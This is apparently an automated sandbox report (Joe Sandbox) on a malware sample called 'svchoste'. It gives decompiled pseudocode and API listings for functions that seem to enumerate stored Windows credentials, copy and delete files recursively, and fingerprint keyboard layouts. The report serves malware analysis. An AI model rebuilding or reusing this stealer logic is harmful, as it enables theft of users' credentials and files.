GetProcAddress.KERNEL32(00000000,02D075E0), ref: 00B89B0B
GetProcAddress.KERNEL32(00000000,02D07600), ref: 00B89B21
GetProcAddress.KERNEL32(00000000,02D06420), ref: 00B89B36
GetProcAddress.KERNEL32(00000000,02D08700), ref: 00B89B4C
GetProcAddress.KERNEL32(00000000,02D08658), ref: 00B89B62
GetProcAddress.KERNEL32(00000000,02D08640), ref: 00B89B77
GetProcAddress.KERNEL32(00000000,HeapFree), ref: 00B89B8B
LoadLibraryA.KERNEL32(02D080A8), ref: 00B89B9C
LoadLibraryA.KERNEL32(02D080C0), ref: 00B89BAC
LoadLibraryA.KERNEL32(02D080D8), ref: 00B89BBC
LoadLibraryA.KERNEL32(02D08108), ref: 00B89BCB
LoadLibraryA.KERNEL32(02D08090), ref: 00B89BDB
LoadLibraryA.KERNEL32(02D08120), ref: 00B89BEB
LoadLibraryA.KERNEL32(02D08358), ref: 00B89BFA
LoadLibraryA.KERNEL32(02D08478), ref: 00B89C0A
LoadLibraryA.KERNEL32(02D084A8), ref: 00B89C1A
LoadLibraryA.KERNEL32(02D08340), ref: 00B89C29
LoadLibraryA.KERNEL32(02D08388), ref: 00B89C39
GetProcAddress.KERNEL32(00000000,02D06358), ref: 00B89C57
GetProcAddress.KERNEL32(00000000,02D076C0), ref: 00B89C6D
GetProcAddress.KERNEL32(00000000,02D06560), ref: 00B89C82
GetProcAddress.KERNEL32(00000000,02D07620), ref: 00B89C98
GetProcAddress.KERNEL32(00000000,02D065D8), ref: 00B89CAE
GetProcAddress.KERNEL32(00000000,02D086D0), ref: 00B89CC3
GetProcAddress.KERNEL32(00000000,02D07720), ref: 00B89CE3
GetProcAddress.KERNEL32(00000000,02D07640), ref: 00B89CF9
GetProcAddress.KERNEL32(00000000,02D07680), ref: 00B89D0E
GetProcAddress.KERNEL32(00000000,02D08688), ref: 00B89D24
GetProcAddress.KERNEL32(00000000,02D076A0), ref: 00B89D3A
GetProcAddress.KERNEL32(00000000,02D076E0), ref: 00B89D4F
GetProcAddress.KERNEL32(00000000,02D086A0), ref: 00B89D65
GetProcAddress.KERNEL32(00000000,02D07B80), ref: 00B89D7B
GetProcAddress.KERNEL32(00000000,02D07940), ref: 00B89D90
GetProcAddress.KERNEL32(00000000,02D07C20), ref: 00B89DA6
GetProcAddress.KERNEL32(00000000,02D07CE0), ref: 00B89DBC
GetProcAddress.KERNEL32(00000000,02D07C80), ref: 00B89DD7
GetProcAddress.KERNEL32(00000000,02D07A80), ref: 00B89DED
GetProcAddress.KERNEL32(00000000,02D07B60), ref: 00B89E09
GetProcAddress.KERNEL32(00000000,02D07B40), ref: 00B89E24
GetProcAddress.KERNEL32(00000000,02D086B8), ref: 00B89E3A
GetProcAddress.KERNEL32(00000000,02D07C40), ref: 00B89E56
GetProcAddress.KERNEL32(00000000,02D08AF0), ref: 00B89E6B
GetProcAddress.KERNEL32(00000000,02D07C60), ref: 00B89E81
GetProcAddress.KERNEL32(00000000,02D08A60), ref: 00B89EA1
GetProcAddress.KERNEL32(00000000,02D079A0), ref: 00B89EB6
GetProcAddress.KERNEL32(00000000,02D08B08), ref: 00B89ECC
GetProcAddress.KERNEL32(00000000,02D08A48), ref: 00B89EE2
GetProcAddress.KERNEL32(00000000,02D07BA0), ref: 00B89EF7
GetProcAddress.KERNEL32(00000000,02D08A90), ref: 00B89F0D
GetProcAddress.KERNEL32(00000000,RegEnumValueA), ref: 00B89F21
GetProcAddress.KERNEL32(00000000,02D08A78), ref: 00B89F3D
GetProcAddress.KERNEL32(00000000,02D06268), ref: 00B89F5D
GetProcAddress.KERNEL32(00000000,02D07BE0), ref: 00B89F72
GetProcAddress.KERNEL32(00000000,02D06290), ref: 00B89F88
GetProcAddress.KERNEL32(00000000,02D079C0), ref: 00B89F9E
GetProcAddress.KERNEL32(00000000,02D08AA8), ref: 00B89FB3
GetProcAddress.KERNEL32(00000000,02D08AC0), ref: 00B89FC9
GetProcAddress.KERNEL32(00000000,02D07C00), ref: 00B89FDF
GetProcAddress.KERNEL32(00000000,02D07CA0), ref: 00B89FF4
GetProcAddress.KERNEL32(00000000,02D08AD8), ref: 00B8A014
GetProcAddress.KERNEL32(00000000,02D08850), ref: 00B8A02A
GetProcAddress.KERNEL32(00000000,02D07BC0), ref: 00B8A03F
GetProcAddress.KERNEL32(00000000,02D07CC0), ref: 00B8A055
GetProcAddress.KERNEL32(00000000,02D07328), ref: 00B8A06B
GetProcAddress.KERNEL32(00000000,02D08A18), ref: 00B8A080
GetProcAddress.KERNEL32(00000000,02D089D0), ref: 00B8A096
GetProcAddress.KERNEL32(00000000,02D088C8), ref: 00B8A0AC
GetProcAddress.KERNEL32(00000000,02D07980), ref: 00B8A0CB
GetProcAddress.KERNEL32(00000000,02D087C0), ref: 00B8A0E1
GetProcAddress.KERNEL32(00000000,02D08958), ref: 00B8A0F7
GetProcAddress.KERNEL32(00000000,02D07A20), ref: 00B8A10C
GetProcAddress.KERNEL32(00000000,02D07438), ref: 00B8A122
GetProcAddress.KERNEL32(00000000,02D07960), ref: 00B8A138
GetProcAddress.KERNEL32(00000000,02D079E0), ref: 00B8A14D

Strings

RegEnumValueA, xrefs: 00B89F18
HeapFree, xrefs: 00B89B82

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: HeapFree$RegEnumValueA
API String ID: 2238633743-3819337796
Opcode ID: 0523da7f93b7a1910926f1a9135eb7b4ec48a5fac71be0369d78ddfa68a4dd73
Instruction ID: 7d14885c36d8114e1687ce6e2b48973382ae410dec264e467b9957bba6708726
Opcode Fuzzy Hash: 0523da7f93b7a1910926f1a9135eb7b4ec48a5fac71be0369d78ddfa68a4dd73
Instruction Fuzzy Hash: 666241B5914204AFC748DFACEC9A99ABBF9FB4E701B148519FA05D3260DF389941CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00B8BEE0, Relevance: 66.5, APIs: 44, Instructions: 492
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 47%

			E00B8BEE0(void* __ebx) {
				int _v8;
				int _v12;
				int _v16;
				short* _v20;
				signed char _v21;
				signed int _v28;
				char _v284;
				char _v540;
				char _v796;
				int _v800;
				struct _OSVERSIONINFOA _v956;
				struct HINSTANCE__* _v960;
				char _v1220;
				intOrPtr _v1224;
				signed int _v1228;
				int _v1232;
				int _v1236;
				int _v1240;
				intOrPtr* _v1244;
				short* _v1248;
				char _v1249;
				intOrPtr _v1256;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t155;
				struct HINSTANCE__* _t162;
				int _t166;
				CHAR* _t171;
				CHAR* _t176;
				short* _t178;
				intOrPtr _t181;
				intOrPtr _t182;
				intOrPtr _t193;
				intOrPtr _t208;
				intOrPtr _t217;
				intOrPtr _t234;
				void* _t256;
				CHAR* _t258;
				CHAR* _t262;
				CHAR* _t264;
				intOrPtr _t267;
				intOrPtr _t276;
				short* _t287;
				intOrPtr _t289;
				intOrPtr _t292;
				intOrPtr _t299;
				intOrPtr _t304;
				CHAR* _t309;
				CHAR* _t311;
				intOrPtr _t324;
				short* _t335;
				intOrPtr _t337;
				short* _t340;
				intOrPtr _t347;
				intOrPtr _t358;
				signed int _t359;
				void* _t360;
				void* _t362;
				void* _t363;
				void* _t372;
				void* _t381;

				_t256 = __ebx;
				_t155 =  *0xba01f4; // 0xac8b3e58
				_v28 = _t155 ^ _t359;
				_v956.dwOSVersionInfoSize = 0;
				E00B791C0( &(_v956.dwMajorVersion), 0, 0x90);
				E00B791C0( &_v956, 0, 0x94);
				_t362 = _t360 + 0x18;
				_v956.dwOSVersionInfoSize = 0x94;
				GetVersionExA( &_v956);
				if(_v956.dwMajorVersion != 6 || _v956.dwMinorVersion < 2) {
					_v1240 = 0;
				} else {
					_v1240 = 1;
				}
				_v21 = _v1240;
				_v20 = 0;
				_v960 = 0;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				_v800 = 0;
				_t258 =  *0xba2504; // 0x2d059b0
				_t162 = LoadLibraryA(_t258); // executed
				_v960 = _t162;
				if(_v960 == 0) {
					L29:
					 *0xba2760(_v8);
					 *0xba2740(); // executed
					_t166 = FreeLibrary(_v960); // executed
					__eflags = _v28 ^ _t359;
					return E00B74354(_t166, _t256, _v28 ^ _t359, _v8, _t357, _t358,  &_v16);
				} else {
					_t309 =  *0xba22ec; // 0x2d06a78
					 *0xba2704 = GetProcAddress(_v960, _t309);
					_t262 =  *0xba24a0; // 0x2d06a00
					 *0xba2740 = GetProcAddress(_v960, _t262);
					_t171 =  *0xba24d4; // 0x2d05fe0
					 *0xba2758 = GetProcAddress(_v960, _t171);
					_t311 =  *0xba23a8; // 0x2d069d0
					 *0xba26fc = GetProcAddress(_v960, _t311);
					_t264 =  *0xba23a8; // 0x2d069d0
					 *0xba275c = GetProcAddress(_v960, _t264);
					_t176 =  *0xba26ec; // 0x2d069e8
					 *0xba2760 = GetProcAddress(_v960, _t176);
					_t178 =  *0xba2704(0xba108c, 0,  &_v16); // executed
					_v20 = _t178;
					if(_v20 != 0) {
						goto L29;
					}
					_t314 = _v16;
					_v20 =  *0xba2758(_v16, 0x200,  &_v12,  &_v8);
					if(_v20 == 0 && _v12 != 0) {
						_t181 =  *0xba2188; // 0x2d06700
						_t267 =  *0xba25d0; // 0x2d06af0
						_t182 = E00B755AB(_t267, _t181);
						_t363 = _t362 + 8;
						_v1224 = _t182;
						_v1228 = 0;
						while(_v1228 < _v12) {
							if((_v21 & 0x000000ff) == 0) {
								_v1236 = _v1228 * 0x34 + _v8;
								_t357 = 0xba109c;
								_t358 = _v1236;
								__eflags = 0;
								asm("repe cmpsd");
								if(0 != 0) {
									L27:
									_t314 = _v1228 + 1;
									_v1228 = _v1228 + 1;
									continue;
								}
								WideCharToMultiByte(0, 0,  *(_v1236 + 0x10), 0xffffffff,  &_v284, 0x100, 0, 0);
								_v1244 =  &_v284;
								_t340 = _v1244 + 1;
								__eflags = _t340;
								_v1248 = _t340;
								do {
									_v1249 =  *_v1244;
									_v1244 = _v1244 + 1;
									__eflags = _v1249;
								} while (_v1249 != 0);
								_v1256 = _v1244 - _v1248;
								__eflags = _v1256 - 2;
								if(__eflags > 0) {
									WideCharToMultiByte(0, 0,  *(_v1236 + 0x10), 0xffffffff,  &_v284, 0x100, 0, 0);
									_t193 =  *0xba23c8; // 0x2d06a18
									E00B755C2(_t256, 0xba109c, _t358, __eflags);
									E00B755C2(_t256, 0xba109c, _t358, __eflags);
									_t276 =  *0xba23b8; // 0x2d06a30
									E00B755C2(_t256, 0xba109c, _t358, __eflags);
									E00B755C2(_t256, _t357, _t358, __eflags);
									WideCharToMultiByte(0, 0,  *((intOrPtr*)(_v1236 + 0x14)) + 0x20, 0xffffffff,  &_v1220, 0x100, 0, 0);
									_t347 =  *0xba2258; // 0x2d068b0
									E00B755C2(_t256, _t357, _t358, __eflags);
									E00B755C2(_t256, _t357, _t358, __eflags);
									WideCharToMultiByte(0, 0,  *((intOrPtr*)(_v1236 + 0x18)) + 0x20, 0xffffffff,  &_v796, 0x100, 0, 0);
									_t208 =  *0xba22b4; // 0x2d06b80
									E00B755C2(_t256, _t357, _t358, __eflags);
									E00B755C2(_t256, _t357, _t358, __eflags);
									_t381 = _t363 + 0x4c;
									_v800 = 0;
									_v20 =  *0xba26fc(_v16, _v1236,  *((intOrPtr*)(_v1236 + 0x14)),  *((intOrPtr*)(_v1236 + 0x18)), 0, 0,  &_v800, _v1224, "\n", _v1224, _t208,  &_v796, _v1224, "\n", _v1224, _t347,  &_v1220, _v1224, "\n", _v1224, _t276,  &_v284, _v1224, "\n", _v1224, _t193);
									__eflags = _v20;
									if(__eflags == 0) {
										_v1236 = _v800;
										_t287 =  *((intOrPtr*)(_v1236 + 0x1c)) + 0x20;
										__eflags = _t287;
										WideCharToMultiByte(0, 0, _t287, 0xffffffff,  &_v540, 0x100, 0, 0);
										_push( &_v540);
										_t217 =  *0xba26c4; // 0x2d06b50
										_push(_t217);
										_push(_v1224);
										E00B755C2(_t256, _t357, _t358, __eflags);
										_push("\n\n");
										_push(_v1224);
										E00B755C2(_t256, _t357, _t358, __eflags);
										_t363 = _t381 + 0x14;
									} else {
										_t289 =  *0xba21a4; // 0x2d06750
										_push(_t289);
										_push(_v1224);
										E00B755C2(_t256, _t357, _t358, __eflags);
										_push("\n\n");
										_push(_v1224);
										E00B755C2(_t256, _t357, _t358, __eflags);
										_t363 = _t381 + 0x10;
									}
								}
								__eflags = _v800;
								if(__eflags != 0) {
									 *0xba2760(_v800);
								}
								goto L27;
							}
							_v1232 = _v1228 * 0x38 + _v8;
							_t357 = 0xba109c;
							_t358 = _v1232;
							asm("repe cmpsd");
							if(0 == 0) {
								WideCharToMultiByte(0, 0,  *(_v1232 + 0x10), 0xffffffff,  &_v284, 0x100, 0, 0);
								_t292 =  *0xba23c8; // 0x2d06a18
								E00B755C2(_t256, 0xba109c, _t358, 0);
								E00B755C2(_t256, 0xba109c, _t358, 0);
								_t324 =  *0xba23b8; // 0x2d06a30
								E00B755C2(_t256, 0xba109c, _t358, 0);
								E00B755C2(_t256, _t357, _t358, 0);
								WideCharToMultiByte(0, 0,  *((intOrPtr*)(_v1232 + 0x14)) + 0x20, 0xffffffff,  &_v1220, 0x100, 0, 0);
								_t234 =  *0xba2258; // 0x2d068b0
								E00B755C2(_t256, _t357, _t358, 0);
								E00B755C2(_t256, _t357, _t358, 0);
								WideCharToMultiByte(0, 0,  *((intOrPtr*)(_v1232 + 0x18)) + 0x20, 0xffffffff,  &_v796, 0x100, 0, 0);
								_t299 =  *0xba22b4; // 0x2d06b80
								E00B755C2(_t256, _t357, _t358, 0);
								E00B755C2(_t256, _t357, _t358, 0);
								_t372 = _t363 + 0x4c;
								_v800 = 0;
								_v20 =  *0xba275c(_v16, _v1232,  *((intOrPtr*)(_v1232 + 0x14)),  *((intOrPtr*)(_v1232 + 0x18)), 0, 0, 0,  &_v800, _v1224, "\n", _v1224, _t299,  &_v796, _v1224, "\n", _v1224, _t234,  &_v1220, _v1224, "\n", _v1224, _t324,  &_v284, _v1224, "\n", _v1224, _t292);
								_t395 = _v20;
								if(_v20 == 0) {
									_v1232 = _v800;
									_t335 =  *((intOrPtr*)(_v1232 + 0x1c)) + 0x20;
									__eflags = _t335;
									WideCharToMultiByte(0, 0, _t335, 0xffffffff,  &_v540, 0x100, 0, 0);
									_push( &_v540);
									_t304 =  *0xba26c4; // 0x2d06b50
									_push(_t304);
									_push(_v1224);
									E00B755C2(_t256, _t357, _t358, __eflags);
									_push("\n\n");
									_push(_v1224);
									E00B755C2(_t256, _t357, _t358, __eflags);
									_t363 = _t372 + 0x14;
								} else {
									_t337 =  *0xba21a4; // 0x2d06750
									_push(_t337);
									_push(_v1224);
									E00B755C2(_t256, _t357, _t358, _t395);
									_push("\n\n");
									_push(_v1224);
									E00B755C2(_t256, _t357, _t358, _t395);
									_t363 = _t372 + 0x10;
								}
								 *0xba2760(_v800);
							}
							goto L27;
						}
						_push(_v1224);
						E00B75EA3(_t256, _t314, _t357, _t358, __eflags);
					}
					goto L29;
				}
			}

0x00b8bee0
0x00b8bee9
0x00b8bef0
0x00b8bef5
0x00b8bf0d
0x00b8bf23
0x00b8bf28
0x00b8bf2b
0x00b8bf3c
0x00b8bf49
0x00b8bf60
0x00b8bf54
0x00b8bf54
0x00b8bf54
0x00b8bf70
0x00b8bf73
0x00b8bf7a
0x00b8bf84
0x00b8bf8b
0x00b8bf92
0x00b8bf99
0x00b8bfa3
0x00b8bfaa
0x00b8bfb0
0x00b8bfbd
0x00b8c618
0x00b8c61c
0x00b8c626
0x00b8c633
0x00b8c63e
0x00b8c648
0x00b8bfc3
0x00b8bfc3
0x00b8bfd7
0x00b8bfdc
0x00b8bff0
0x00b8bff5
0x00b8c008
0x00b8c00d
0x00b8c021
0x00b8c026
0x00b8c03a
0x00b8c03f
0x00b8c052
0x00b8c062
0x00b8c068
0x00b8c06f
0x00000000
0x00000000
0x00b8c082
0x00b8c08c
0x00b8c093
0x00b8c0a3
0x00b8c0a9
0x00b8c0b0
0x00b8c0b5
0x00b8c0b8
0x00b8c0be
0x00b8c0d9
0x00b8c0ee
0x00b8c349
0x00b8c354
0x00b8c359
0x00b8c35f
0x00b8c361
0x00b8c363
0x00b8c604
0x00b8c0d0
0x00b8c0d3
0x00000000
0x00b8c0d3
0x00b8c389
0x00b8c395
0x00b8c3a1
0x00b8c3a1
0x00b8c3a4
0x00b8c3aa
0x00b8c3b2
0x00b8c3b8
0x00b8c3bf
0x00b8c3bf
0x00b8c3d4
0x00b8c3da
0x00b8c3e1
0x00b8c407
0x00b8c40d
0x00b8c41a
0x00b8c42e
0x00b8c43d
0x00b8c44b
0x00b8c45f
0x00b8c48a
0x00b8c497
0x00b8c4a5
0x00b8c4b9
0x00b8c4e4
0x00b8c4f1
0x00b8c4fe
0x00b8c512
0x00b8c517
0x00b8c51a
0x00b8c554
0x00b8c557
0x00b8c55b
0x00b8c58f
0x00b8c5b0
0x00b8c5b0
0x00b8c5b8
0x00b8c5c4
0x00b8c5c5
0x00b8c5ca
0x00b8c5d1
0x00b8c5d2
0x00b8c5da
0x00b8c5e5
0x00b8c5e6
0x00b8c5eb
0x00b8c55d
0x00b8c55d
0x00b8c563
0x00b8c56a
0x00b8c56b
0x00b8c573
0x00b8c57e
0x00b8c57f
0x00b8c584
0x00b8c584
0x00b8c55b
0x00b8c5ee
0x00b8c5f5
0x00b8c5fe
0x00b8c5fe
0x00000000
0x00b8c5f5
0x00b8c100
0x00b8c10b
0x00b8c110
0x00b8c118
0x00b8c11a
0x00b8c140
0x00b8c146
0x00b8c154
0x00b8c168
0x00b8c177
0x00b8c185
0x00b8c199
0x00b8c1c4
0x00b8c1d1
0x00b8c1de
0x00b8c1f2
0x00b8c21d
0x00b8c22a
0x00b8c238
0x00b8c24c
0x00b8c251
0x00b8c254
0x00b8c290
0x00b8c293
0x00b8c297
0x00b8c2cb
0x00b8c2ec
0x00b8c2ec
0x00b8c2f4
0x00b8c300
0x00b8c301
0x00b8c307
0x00b8c30e
0x00b8c30f
0x00b8c317
0x00b8c322
0x00b8c323
0x00b8c328
0x00b8c299
0x00b8c299
0x00b8c29f
0x00b8c2a6
0x00b8c2a7
0x00b8c2af
0x00b8c2ba
0x00b8c2bb
0x00b8c2c0
0x00b8c2c0
0x00b8c332
0x00b8c332
0x00000000
0x00b8c338
0x00b8c60f
0x00b8c610
0x00b8c615
0x00000000
0x00b8c093

APIs

_memset.LIBCMT ref: 00B8BF0D
_memset.LIBCMT ref: 00B8BF23
GetVersionExA.KERNEL32(00000094), ref: 00B8BF3C
LoadLibraryA.KERNEL32(02D059B0), ref: 00B8BFAA
GetProcAddress.KERNEL32(00000000,02D06A78), ref: 00B8BFD1
GetProcAddress.KERNEL32(00000000,02D06A00), ref: 00B8BFEA
GetProcAddress.KERNEL32(00000000,02D05FE0), ref: 00B8C002
GetProcAddress.KERNEL32(00000000,02D069D0), ref: 00B8C01B
GetProcAddress.KERNEL32(00000000,02D069D0), ref: 00B8C034
GetProcAddress.KERNEL32(00000000,02D069E8), ref: 00B8C04C

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: AddressProc$_memset$LibraryLoadVersion
String ID:
API String ID: 173895360-0
Opcode ID: ec172dd9e8ec187702b77bc154ad9102a34c39b82ca88ece31afd5f38ba0b26b
Instruction ID: 83a8dd1aaf4445d421c5e19bb5276755d26f020b117fb2e0d7635b588fa45a3c
Opcode Fuzzy Hash: ec172dd9e8ec187702b77bc154ad9102a34c39b82ca88ece31afd5f38ba0b26b
Instruction Fuzzy Hash: FB1291B1A01218ABDB64DF54DC86F9A77B9EB58701F1081C8F60DA72D0DB74AE84CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00B90540, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 151
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E00B90540(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				char _v276;
				void* _v280;
				struct _WIN32_FIND_DATAA _v604;
				char _v868;
				char _v1132;
				intOrPtr* _v1136;
				intOrPtr* _v1140;
				char _v1141;
				char _v1142;
				intOrPtr _v1148;
				intOrPtr _v1152;
				intOrPtr* _v1156;
				intOrPtr* _v1160;
				char _v1161;
				char _v1162;
				intOrPtr _v1168;
				intOrPtr _v1172;
				signed int _t72;
				int _t77;
				char _t78;
				int _t81;
				char _t83;
				void* _t87;
				char _t97;
				char _t98;
				void* _t99;
				intOrPtr* _t117;
				intOrPtr* _t118;
				void* _t124;
				void* _t125;
				signed int _t126;
				void* _t127;
				void* _t128;
				void* _t130;
				void* _t131;

				_t125 = __esi;
				_t124 = __edi;
				_t99 = __ebx;
				_t72 =  *0xba01f4; // 0xac8b3e58
				_v8 = _t72 ^ _t126;
				wsprintfA( &_v276, "%s\\*", _a12);
				_t128 = _t127 + 0xc;
				_t116 =  &_v604;
				_t77 = FindFirstFileA( &_v276,  &_v604); // executed
				_v280 = _t77;
				if(_v280 != 0xffffffff) {
					do {
						_v1136 = ".";
						_v1140 =  &(_v604.cFileName);
						while(1) {
							_t117 = _v1140;
							_t78 =  *_t117;
							_v1141 = _t78;
							if(_t78 !=  *_v1136) {
								break;
							}
							if(_v1141 == 0) {
								L7:
								_v1148 = 0;
							} else {
								_t117 = _v1140;
								_t98 =  *((intOrPtr*)(_t117 + 1));
								_v1142 = _t98;
								_t19 = _v1136 + 1; // 0x2e000000
								if(_t98 !=  *_t19) {
									break;
								} else {
									_v1140 = _v1140 + 2;
									_v1136 = _v1136 + 2;
									if(_v1142 != 0) {
										continue;
									} else {
										goto L7;
									}
								}
							}
							L9:
							_v1152 = _v1148;
							if(_v1152 != 0) {
								_v1156 = "..";
								_v1160 =  &(_v604.cFileName);
								while(1) {
									_t118 = _v1160;
									_t83 =  *_t118;
									_v1161 = _t83;
									if(_t83 !=  *_v1156) {
										break;
									}
									if(_v1161 == 0) {
										L15:
										_v1168 = 0;
									} else {
										_t118 = _v1160;
										_t97 =  *((intOrPtr*)(_t118 + 1));
										_v1162 = _t97;
										_t41 = _v1156 + 1; // 0x2500002e
										if(_t97 !=  *_t41) {
											break;
										} else {
											_v1160 = _v1160 + 2;
											_v1156 = _v1156 + 2;
											if(_v1162 != 0) {
												continue;
											} else {
												goto L15;
											}
										}
									}
									L17:
									_v1172 = _v1168;
									if(_v1172 != 0) {
										wsprintfA( &_v1132, "%s\\%s", _a12,  &(_v604.cFileName));
										_t87 = E00B752FA(_t125, _a8, 0xb99492);
										_t130 = _t128 + 0x18;
										if(_t87 != 0) {
											wsprintfA( &_v868, "%s\\%s", _a8,  &(_v604.cFileName));
											_t131 = _t130 + 0x10;
										} else {
											wsprintfA( &_v868, "%s",  &(_v604.cFileName));
											_t131 = _t130 + 0xc;
										}
										E00B89580(_a4,  &_v868,  &_v1132); // executed
										DeleteFileA( &_v1132); // executed
										E00B90540(_t99, _t124, _t125, _a4,  &_v868,  &_v1132); // executed
										_t128 = _t131 + 0x18;
									} else {
										goto L18;
									}
									goto L23;
								}
								asm("sbb edx, edx");
								asm("sbb edx, 0xffffffff");
								_v1168 = _t118;
								goto L17;
							}
							goto L23;
						}
						asm("sbb edx, edx");
						asm("sbb edx, 0xffffffff");
						_v1148 = _t117;
						goto L9;
						L23:
						_t116 =  &_v604;
						_t81 = FindNextFileA(_v280,  &_v604); // executed
					} while (_t81 != 0);
					_t77 = FindClose(_v280);
				} else {
				}
				return E00B74354(_t77, _t99, _v8 ^ _t126, _t116, _t124, _t125);
			}

0x00b90540
0x00b90540
0x00b90540
0x00b90549
0x00b90550
0x00b90563
0x00b90569
0x00b9056c
0x00b9057a
0x00b90580
0x00b9058d
0x00b90594
0x00b90594
0x00b905a4
0x00b905aa
0x00b905aa
0x00b905b0
0x00b905b2
0x00b905c0
0x00000000
0x00000000
0x00b905c9
0x00b905fc
0x00b905fc
0x00b905cb
0x00b905cb
0x00b905d1
0x00b905d4
0x00b905e0
0x00b905e3
0x00000000
0x00b905e5
0x00b905e5
0x00b905ec
0x00b905fa
0x00000000
0x00000000
0x00000000
0x00000000
0x00b905fa
0x00b905e3
0x00b90613
0x00b90619
0x00b90626
0x00b9062c
0x00b9063c
0x00b90642
0x00b90642
0x00b90648
0x00b9064a
0x00b90658
0x00000000
0x00000000
0x00b90661
0x00b90694
0x00b90694
0x00b90663
0x00b90663
0x00b90669
0x00b9066c
0x00b90678
0x00b9067b
0x00000000
0x00b9067d
0x00b9067d
0x00b90684
0x00b90692
0x00000000
0x00000000
0x00000000
0x00000000
0x00b90692
0x00b9067b
0x00b906ab
0x00b906b1
0x00b906be
0x00b906dc
0x00b906ee
0x00b906f3
0x00b906f8
0x00b9072f
0x00b90735
0x00b906fa
0x00b9070d
0x00b90713
0x00b90713
0x00b9074a
0x00b90759
0x00b90771
0x00b90776
0x00000000
0x00000000
0x00000000
0x00000000
0x00b906be
0x00b906a0
0x00b906a2
0x00b906a5
0x00000000
0x00b906a5
0x00000000
0x00b90626
0x00b90608
0x00b9060a
0x00b9060d
0x00000000
0x00b90779
0x00b90779
0x00b90787
0x00b9078d
0x00b9079c
0x00000000
0x00b9058f
0x00b907af

APIs

wsprintfA.USER32 ref: 00B90563
FindFirstFileA.KERNELBASE(?,?), ref: 00B9057A
FindNextFileA.KERNEL32(000000FF,?), ref: 00B90787
FindClose.KERNEL32(000000FF), ref: 00B9079C

Strings

%s\%s, xrefs: 00B906D0
%s\%s, xrefs: 00B90723
%s\*, xrefs: 00B90557

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: 62548bfcd3f5b77bdb8772e6f72535160e54aefe1aaa8aa784a9754dda3278c8
Instruction ID: 1ecd815307423c6bf6cf717cb10871eb4f237f6b1d11cfaf460b7cde4ab63882
Opcode Fuzzy Hash: 62548bfcd3f5b77bdb8772e6f72535160e54aefe1aaa8aa784a9754dda3278c8
Instruction Fuzzy Hash: 4F616BB19142689FCF24DF68CC85BE9BBB4AF59304F0486E8E65D53241DB319E88CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00B8AA60, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 88
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00B8AA60(void* __ebx, void* __edi, void* __esi) {
				void* _v8;
				signed int _v12;
				char _v524;
				int _v528;
				int _v532;
				void* _v536;
				signed int _v540;
				signed int _t34;
				void* _t56;
				void* _t70;
				void* _t71;
				signed int _t72;
				void* _t73;
				void* _t74;

				_t71 = __esi;
				_t70 = __edi;
				_t56 = __ebx;
				_t34 =  *0xba01f4; // 0xac8b3e58
				_v12 = _t34 ^ _t72;
				_v536 = HeapAlloc(GetProcessHeap(), 0, 0x1f4);
				_v528 = 0;
				_v8 = 0;
				_v532 = GetKeyboardLayoutList(0, 0);
				_v8 = LocalAlloc(0x40, _v532 << 2);
				_t65 = _v532;
				_v532 = GetKeyboardLayoutList(_v532, _v8);
				_v540 = 0;
				while(_v540 < _v532) {
					GetLocaleInfoA( *(_v8 + _v540 * 4) & 0x0000ffff, 2,  &_v524, 0x200); // executed
					if(_v528 == 0) {
						wsprintfA(_v536, "%s",  &_v524);
						_t74 = _t73 + 0xc;
					} else {
						wsprintfA(_v536, "%s / %s", _v536,  &_v524);
						_t74 = _t73 + 0x10;
					}
					_t65 = _v528 + 1;
					_v528 = _v528 + 1;
					E00B791C0( &_v524, 0, 0x200);
					_t73 = _t74 + 0xc;
					_v540 = _v540 + 1;
				}
				if(_v8 != 0) {
					LocalFree(_v8);
				}
				return E00B74354(_v536, _t56, _v12 ^ _t72, _t65, _t70, _t71);
			}

0x00b8aa60
0x00b8aa60
0x00b8aa60
0x00b8aa69
0x00b8aa70
0x00b8aa87
0x00b8aa8d
0x00b8aa97
0x00b8aaa8
0x00b8aac0
0x00b8aac7
0x00b8aad4
0x00b8aada
0x00b8aaf5
0x00b8ab23
0x00b8ab30
